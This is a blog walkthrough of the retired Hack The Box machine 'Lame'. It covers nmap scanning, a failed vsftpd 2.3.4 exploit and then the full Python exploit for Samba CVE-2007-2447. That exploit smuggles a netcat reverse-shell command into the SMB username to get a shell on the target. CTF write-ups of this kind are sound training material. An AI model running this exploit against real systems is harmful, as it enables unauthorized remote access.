CTFHackTheBox

Lame – HTB Walkthrough

Lame is an Easy rated and retired machine on HackTheBox. As always, we start with nmap, including the -p- switch to enumerate all ports.

sudo nmap -sV -sC -p- 10.10.10.3

We have FTP, SMB, and something I don’t know and going to have to look up. Let’s concentrate on FTP and SMB first.

Try anonymous login on FTP, which we can enter.

Although there doesn’t seem to be anything in here. What about the version? Let’s check vsftpd 2.3.4

There are couple of exploits but I don’t really want to use Metasploit.

I came across this Python exploit. It seems easy enough to get going

https://github.com/ahervias77/vsftpd-2.3.4-exploit

But it didn’t see to work and just hangs. It might be patched?

I can’t really find any other exploits so let’s turn enumerate port 445 a little further and search for vulnerabilities.

sudo nmap --script smb-vuln* -p 139,445 10.10.10.3

This doesn’t really help us. We have the Samba version from our nmap, so let’s use Searchsploit.

Seems to be a few. A quick Google I come across CVE-2007-2447

https://github.com/amriunix/CVE-2007-2447/blob/master/usermap_script.py

We cat the file. Everything seems easy enough and this should return a reverse shell to us via Netcat.

#!/usr/bin/python
# -*- coding: utf-8 -*-

# From : https://github.com/amriunix/cve-2007-2447
# case study : https://amriunix.com/post/cve-2007-2447-samba-usermap-script/

import sys
from smb.SMBConnection import SMBConnection

def exploit(rhost, rport, lhost, lport):
        payload = 'mkfifo /tmp/hago; nc ' + lhost + ' ' + lport + ' 0</tmp/hago | /bin/sh >/tmp/hago 2>&1; rm /tmp/hago'
        username = "/=`nohup " + payload + "`"
        conn = SMBConnection(username, "", "", "")
        try:
            conn.connect(rhost, int(rport), timeout=1)
        except:
            print '[+] Payload was sent - check netcat !'

if __name__ == '__main__':
    print('[*] CVE-2007-2447 - Samba usermap script')
    if len(sys.argv) != 5:
        print("[-] usage: python " + sys.argv[0] + " <RHOST> <RPORT> <LHOST> <LPORT>")
    else:
        print("[+] Connecting !")
        rhost = sys.argv[1]
        rport = sys.argv[2]
        lhost = sys.argv[3]
        lport = sys.argv[4]
        exploit(rhost, rport, lhost, lport)

Setup our listener on port 13376 and run the exploit. We are on the box.

From here we can grab the user and root flags.

Mark

Mark like CTF's, his home lab and walks on the beach. He holds SANS certifications in Forensics and Information Security. Currently working in the cybersecurity field.
Back to top button